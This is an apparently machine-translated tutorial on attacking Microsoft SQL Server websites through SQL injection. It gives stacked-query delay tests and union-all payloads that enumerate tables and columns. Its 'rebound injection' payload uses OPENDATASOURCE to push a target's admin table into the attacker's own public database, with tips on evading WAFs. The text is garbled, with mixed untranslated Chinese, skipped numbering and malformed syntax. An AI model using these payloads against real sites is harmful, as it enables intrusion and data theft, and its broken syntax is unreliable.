1. What is MSSQL
MS SQL actually refers to Microsoft's SQL Server database server, and MYSQL can be said to be a simplified version of MSSQL. MYSQL database is generally dedicated to PHP websites, suitable for small and medium-sized websites, and is also open source. MSSQL is currently used in large websites, usually for business websites. Because it is developed by Microsoft, it is charged and more expensive!
The basic syntax difference between MSSQL and MYSQL: (only for commonly used syntaxes for penetration testing)
MYSQL: 1.use‘;'Come as the end of the statement 2. Use ‘\'Escape 3.System-owned library: mysql、information_schema、performance_schema、sys 4.Query the current database name:database() 5.View table name:tables MSSQL: 1.‘;'Is optional,Writable or not,butMSSQLProvided ingoKeywords are the end of batch statements 2.existSQL ServerThere is no need to escape,有歧义的时候只需use引号即可 3.System-owned library: Master、Model、Msdb、Tempdb 4.Query the current database name:db_name() 5.View table name:sysobjects
2. Principle
Let the target insert the obtained information into the penetration tester's database
Injection conditions
a. The goal must be able to access the external network
b. The inserted database must be able to connect with public IP
4. Injection steps
a. Rebound injection
--1.BuildMSSQLenvironment
/*It is unrealistic to build an MSSQL environment yourself. First of all, you must have a public network IP. Only with a public network IP can you insert the queryed data into
to our database. Here you can apply for a free virtual space to help us build an MSSQL environment.
For example: Alwaysdata, ProFreeHost, * Cloud, etc. */
--2.Connect to the public database
--useNavicatDatabase Management Tool Connection,Connection name any,The host is the local address
--3.Determine whether stack injection exists
;select name from sysobjects waitfor delay ‘00:00:05:00'//If the website is delayed, it means there is--4.Create a new table in the connected database to store the data
--5.Rebound injection
--useopendatasource函数进行Rebound injection。
OPENDATASOURCE(provider_name,init_string)
/*provider_name is the name of the PROGID of the OLE DB provider used to access the data source
init_string is the connection address, port, username, password, and database name
server=connection address, port;uid=user name;pwd=password;database=database name*/
--For example:
insert into opendatasource(‘sqloledb','server=den1.,1433;uid=0;pwd=0;database=admin'). select *from admin — qwe
/*insert into represents statement attribute, is an insert statement
opendatasource('sqloledb','server=den1.,1433;uid=0;pwd=0;database=admin'). Indicates where to insert the query content
select *from admin means the content to be checked and the data
*/Joint query injection
<1. Use regular SQL injection to check the number of fields
<2.Judge the misalignment
Since MSSQL syntax is stricter than MYSQL, you cannot directly fill in the numbers to find misalignments. In MYSQL, union only needs to satisfy the same number of fields, but if your fill bit does not match the database field type in MSSQL, there is no data to display! Moreover, it is best to use union all for MSSQL joint query! If you don’t know what type it is, you can fill in ‘null’.
'union all select 'null','null','null' --s1
Then replace null with numbers one by one to determine the type
At this point, you can guess that it is an MSSQL database, so the next step cannot continue to check the data according to the syntax of SQL injection.
< 3. Check the table name
Use MSSQL to get user-built tables
'union all select id,name,'null' from sysobjects where xtype='U' --s2
<4. Check the field name
'union all select 'null',name,'null' from where id=··· ··· --s3
<5. Check the field content
'union all select Field name,Field name,Field name from Table name --q
5. Supplement
Bounce injection is used to solve blinds, WAF interception, and access is blocked too quickly.
Stack Injection:
a. Principle
In SQL, a semicolon (;) is used to represent the end of a SQL statement. Just imagine if we continue to construct the next statement after ending a sql statement. Will it be executed together? Therefore, this idea creates stack injection. Union injection also merges two statements together. Is there any difference between the two? The difference is that the statement types executed by union or union all are limited and can be used to execute query statements, while stack injection can execute arbitrary statements.
b. Limitations
<1. The limitation of stack injection is that not every environment can be executed, and may be subject to restrictions that are not supported by API or database engines;
<2. Stacking queries can execute arbitrary SQL statements, but this injection method is not very perfect. In our web system, because the code usually only returns one query result, stack injection of the second statement generates an error or the result can only be ignored, and we cannot see the return result in the front-end interface;
< 3. Before using stack injection, we also need to know some database-related information, such as table names, column names, etc.
This is all about this article about MSSQL rebound injection. For more related MSSQL rebound injection, please search for my previous articles or continue browsing the related articles below. I hope everyone will support me in the future!